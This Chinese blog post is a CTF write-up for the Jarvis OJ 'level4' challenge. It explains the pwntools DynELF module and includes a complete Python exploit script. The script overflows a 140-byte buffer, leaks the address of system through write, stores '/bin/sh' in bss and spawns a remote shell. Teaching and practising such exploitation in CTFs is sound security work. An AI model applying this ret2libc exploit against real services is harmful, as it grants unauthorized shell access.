Jarvis OJ Level4

最新推荐文章于 2022-12-04 21:41:22 发布
最新推荐文章于 2022-12-04 21:41:22 发布
阅读量453 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_39153421/article/details/89709698
版权

写在最前面:

  在漏洞利用的时候,如果没有给出libc库,可以先泄漏两个函数的地址,然后再去查libc的版本号。但是,这种有时候可能失效。现在利用DynELF工具来泄漏system函数的地址,然后再往一个地方写’/bin/sh’字符串并构造调用system函数的栈。下面以Jarvis OJ中的level4这道题为例,使用DynELF实现漏洞利用。

  在写之前先了解一下DynELF这个工具:
DynELF是pwntools中专门用来应对无libc情况的漏洞利用模块,其基本代码框架如下。

p = process('./xxx')
def leak(address):
  #各种预处理
  payload = "xxxxxxxx" + address + "xxxxxxxx"
  p.send(payload)
  #各种处理
  data = p.recv(4)
  log.debug("%#x => %s" % (address, (data or '').encode('hex')))
  return data
d = DynELF(leak, elf=ELF("./xxx"))      #初始化DynELF模块
systemAddress = d.lookup('system', 'libc')  #在libc文件中搜索system函数的地址

  需要使用者进行的工作主要集中在leak函数的具体实现上,上面的代码只是个模板。其中,address就是leak函数要泄漏信息的所在地址,而payload就是触发目标程序泄漏address处信息的攻击代码。

使用条件

  不管有没有libc文件,要想获得目标系统的system函数地址,首先都要求目标二进制程序中存在一个能够泄漏目标系统内存中libc空间内信息的漏洞。同时,由于我们是在对方内存中不断搜索地址信息,故我们需要这样的信息泄露漏洞能够被反复调用。

以下是大致归纳的主要使用条件:

  1. 目标程序存在可以泄露libc空间信息的漏洞,如read@got就指向libc地址空间内;
  2. 目标程序中存在的信息泄露漏洞能够反复触发,从而可以不断泄露libc地址空间内的信息。

  当然,以上仅仅是实现利用的基本条件,不同的目标程序和运行环境都会有一些坑需要绕过。接下来,我们主要针对write和read这两个普遍用来泄漏信息的函数在实际配合DynELF工作时可能遇到的问题,给出相应的解决方法。

--引于安全客

JARVIS OJ上的一道题:

链接https://pan.baidu.com/s/16DR-sNgWGBfOayuLrbCPJw 密码:9f7p

程序运行:


sv1wyAB.png

checksec查看一下保护:


kX7wBH9.png

开了NX栈内代码不可执行保护,且是一个32位程序,ida反汇编看一下溢出点:


DzMREEH.png

可以看到在vulnerable_function()函数中buf存在明显溢出,且显示buf大小为0x88h,我们用gdb动态调试看一下具体的buf到ebp的大小,方法很多,这里用gdb带的pattern:


CZnIL54.png

然后用pattern offest address


S01Xzfc.png


Vct4Rs1.png

0x88+0x4=0x8c=140可见ida显示正确,之后看程序中是否有关键的系统system函数 “/bin/sh”字符:
经过查看没有,本题也没有给出远程的libc库,所以我们可以采用DynELF来泄露,思路就是通过DynELF模块泄露出system,然后将参数/bin/sh写入bss段上去。之后再次进行覆盖得到shell

上面已经给出了DynELF的模板,可以直接改写leak函数:

from pwn import *
io=remote("pwn2.jarvisoj.com",9880)
elf=ELF("./level4")

vuln=0x804844B
writeplt=elf.plt["write"]
readplt=elf.plt["read"]
bss_addr=elf.bss()
#泄露leak system地址
def leak(address):
    payload="a"*0x88+"aaaa"+p32(writeplt)+p32(vuln)+p32(1)+p32(address)+p32(4)
    io.sendline(payload)
    leak_sysaddr=io.recv(4)
    #print "%#x => %s" % (address, (leak_sysaddr or '').encode('hex'))
    return leak_sysaddr

d = DynELF(leak, elf=ELF("./level4"))
sysaddr=d.lookup("system","libc")

print hex(sysaddr)
#通过read函数写/bin/sh到bss段
payload1="a"*0x88+"aaaa"+p32(readplt)+p32(vuln)+p32(1)+p32(bss_addr)+p32(8)
io.sendline(payload1)
io.sendline("/bin/sh")
#pwn  it
payload2="a"*0x88+"aaaa"+p32(sysaddr)+p32(vuln)+p32(bss_addr)
io.sendline(payload2)
io.interactive()

测试:


j8lkluH.png

其他还有相关用ROP写的exp

你的支持是我最大的动力!

2.jpg支付宝
1.png微信
一梦不醒
关注
Jarvis OJ --level4
Kni9hT's Blog
11-11 274
level4与level1、2、3的区别在于:无system、无"/bin/sh"、无libc 要点:使用DynELF函数leak system函数真实地址,然后用read函数写"/bin/sh\x00"到bss段,然后调用system("/bin/sh")去getshell。 题目链接: level4.0f9cfa0b7bb6c0f9e030a5541b46e9f0 先查看开了哪些保护: 和l...
Jarvis OJ level1
Kni9hT's Blog
11-08 632
要点:使用shellcraft.i386()来编写shellcode 和level0相比,本题没有system函数可以直接调用。 所以我们要发送shellcode来getshell 首先看一下开了哪些保护。(好吧,不出意料是全裸) 然后IDA里面看函数调用,main()函数先调用了vulnerable_function函数。 vulnerable_function: text:0804847B ...
jarvis oj level4
发蝴蝶和大脑斧的博客
12-05 616
与level3相比没有提供libc.so文件。学习使用Dynelf: def leak(address):
jarvisoj_level4
m0sway的博客
11-25 925
jarvisoj_level4 使用checksec查看: NX,估计还是一道栈题目,拉进IDA中查看: 主函数中给出了漏洞函数,跟进查看: read()读取了0x100,buf变量距离ebp0x88,存在栈溢出。 程序没有system和/bin/sh,需要自己泄露libc去找,一道标准的ret2libc题目。 exp: from os import sendfile from pwn import * #start r = remote("node4.buuoj.cn",27632) # r =
jarvisoj level4 wp ROP及DynELF模块
ditto的博客
12-31 558
拿到题目 开启了NX。 放IDA里: 栈溢出。 程序本身没有调用system函数 无法ret2plt。 且题目本身没有给出目标的动态库的版本。题目本身有write函数,可以泄露内存,则可以利用pwntools的DynELF模块,找到system函数。 本身程序段没有/bin/sh的字符串,则需要使用read函数将字符串读入,read函数有三个参数,这就需要pop pop pop ret这...
BUUCTF---jarvisoj_level4
qq_33010875的博客
09-26 317
环境:WSL2,ubuntu16.04,python2 checksec文件: 将文件拖入ida 溢出点: 和level3不同的是 read函数之前没有调用write函数,因此要泄露libc的基地址需要用read函数,利用write函数将read函数在got表中的地址泄露出来 payload = (0x88+0x04)*'a'+p32(write_plt)+p32(main_addr)+p(1)+p32(read_got)+p(4) 接受泄露出来的地址 read_addr = u32(io.recv(
BUUCTF jarvisoj_level0
m0_54262894的博客
10-27 353
先checksec,仅开启了NX保护 运行一下 放入ida中 查看main函数 没有什么关键信息,双击vulnerable_function() 在这里我们看到了漏洞 buf定义了80个字节,而我们可以输入更多的数据 接着找找后门函数 这道题很简单,已经把后门给我们展示出来了 记住后门函数的地址0x400596 做完以上步骤我们就有思路了: 覆盖buf 的80个字节 因为是64位的文件,然后再加8个字节...
Jarvis OJ--level3
Kni9hT's Blog
11-10 274
要点:通过read()的溢出构造rop链,获得write()函数的真实地址,再利用libc的偏移算出system和“/bin/sh”的地址,再次利用write()溢出,执行system,就能得到shell。 添加链接描述 flag: CTF{d85346df5770f56f69025bc3f5f1d3d0} ...
[BUUCTF]PWN-jarvisoj_level4
红凳子的博客
04-07 567
[BUUCTF]PWN-jarvisoj_level4前言一、程序分析二、漏洞利用方法一:使用LibcSearcher寻找libc版本方法二:使用DynELF函数进行泄露 前言 在这篇文章中将学习到劫持read函数、使用LibcSearcher寻找libc版本和DynELF函数的使用 提示:以下是本篇文章正文内容,下面案例可供参考 一、程序分析 从中可以看出,32位程序,i386架构,开启了NX保护。 输入点在vulnerable_function里,read试图向长度0x88的地址空间写入0x10
JarvisOJ level4
PLpa的博客
07-08 2373
这题与level3相比就是就是题目并没有给出对应的libc文件,这里就要学习使用一波DynELF函数了,这是pwntools的一个函数,使用前请确认安装完整pwntools工具。 前言: DynELF函数是通过已知函数,迅速查找libc库,并不需要我们自己本身知道对应版本的libc文件。 这是DynELF函数使用的一个模板: def leak(address): payload=pad+p...
jarvisoj——[XMAN]level4
王嘟嘟的博客
07-19 452
题目 Wp 检查基础项,有NX保护 ida看的时候还是之前的那种,但是没有给lib,需要自己去找 那么这里第一步,肯定是找到system的地址 第二步将/bin/sh写入bss字段 第三部调用即可
(Jarvis Oj)(Pwn) level4
Nothing
05-01 1166
(Jarvis Oj)(Pwn) level4 先看一下保护措施,没什么奇怪的地方。 这次并没有给libc的文件,开始通过泄露得到的__libc_start_main地址对照libc库,并没有成功。于是就学了一波DynELF,这个模块的原理还是不太清楚(玄学),以后来填。总之利用这个模块可以找到system的地址,但是找不到”/bin/sh”这个字符串位置,但是我们可以控制read函数,所...
jarvis oj level4 wp
pppp974的博客
07-18 389
先简单看一下代码 很容易发现这是一个栈溢出,此题考虑使用DynELF来获取system函数的位置,然后使用read将’bin/sh’写入bss段之中,最后通过栈溢出进行调用。exp如下。 #!/usr/bin/env python from pwn import * elf = ELF('./level4') plt_write = elf.symbols['write'] plt_read...
18.9.20 Jarvis OJ PWN----[XMAN]level4
qq_42192672的博客
09-20 488
checksec之后,发现可以栈溢出 找可以溢出的地方 我们可以读取无穷无尽的数 但是在IDA中没找到system函数,同时题目也没有给我们lib文件,咋办………… 根据大佬的资料,了解到了pwntools的一个函数DynELF,DynELF函数可以leak system的真实地址,当然最后我们还是要用rop代码重新还原回去执行的 先看一下DynELF怎么用,基本流程如下 d ...
BUUCTF-jarvisoj_level4
Rt1Text的博客
12-04 285
很明显的栈溢出,没有system(bin/sh) 32位的ret2libc3老规矩的脚本
[BUUCTF]PWN--------jarvisoj_level4
BangSen1的博客
04-02 384
jarvisoj_level4 例行检查,32位,开启NX保护 运行一下 用IDA打开。查看主函数 查看vulnerable_function()函数 buf存在溢出漏洞。 是一道ret2libc类型的题目。 利用第一次溢出泄露libc版本,从而获取system函数和"/bin/sh"的地址,并且返回重新执行主函数。 再利用第二次栈溢出跳转执行system("/bin/sh") from pwn import * from LibcSearcher import * context(os = "
jarvisoj_level0
最新发布
08-14
引用是一段关于利用pwntools库对jarvisoj_level0进行攻击的代码。代码中使用了remote()方法建立了远程连接,并构造了一个payload来利用栈溢出漏洞,最终执行callsystem()函数来获取shell权限。引用也是类似的代码,...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值